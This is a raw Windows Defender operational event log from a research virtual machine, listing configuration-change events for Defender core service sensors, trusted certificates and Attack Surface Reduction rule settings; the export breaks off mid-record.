11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=594
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\DiskSensor\MonitoredTargets = msmpeng|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\DiskSensor\MonitoredTargets =
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=593
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\CrashSensor\MonitoredTargets = msmpeng|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CrashSensor\MonitoredTargets = mpdefendercoreservice|msmpeng|nissrv
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=592
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\CpuSensor\LowThresholds = 5|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CpuSensor\LowThresholds = 10|10|10
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=591
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\CpuSensor\MonitoredTargets = msmpeng|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CpuSensor\MonitoredTargets = mpdefendercoreservice|msmpeng|nissrv
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=590
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\CpuSensor\HighThresholds = 95|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CpuSensor\HighThresholds = 95|95|95
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=589
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\WdTimerMonitorInterval = 0x1388
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\WdTimerMonitorInterval = 0x493E0
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=588
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\MdTrustedSubjectOrgs =
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MdTrustedSubjectOrgs = Microsoft Corporation|DigiCert Inc
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=587
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\WdConfigHash = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\WdConfigHash = 0x51AE05A1
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=586
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\MdTrustedRootCertThumbPrints =
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MdTrustedRootCertThumbPrints = CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F|4348A0E9444C78CB265E058D5E8944B4D84F9662BD26DB257F8934A443C70161
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=585
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\WdTimerInitalDelay = 0x1388
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\WdTimerInitalDelay = 0x493E2
11/14/2023 10:42:33 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=581
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
11/14/2023 10:42:33 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=580
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
New value: Default\ServiceStartStates = 0x0
11/14/2023 10:42:30 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=579
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ServiceStartStates = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
11/14/2023 10:42:14 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=578
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=577
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=576
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=575
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=574
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=573
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=572
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=571
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=570
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=569
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=568
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=567
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=566
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=565
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=564
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=563
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
11/14/2023 10:22:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=562
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=561
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=560
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=559
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=558
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=557
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=556
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=555
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=554
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=553
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=552
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=551
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=550
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=549
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=548
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0
11/14/2023 10:21:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=547
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x0
11/14/2023 10:20:24 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
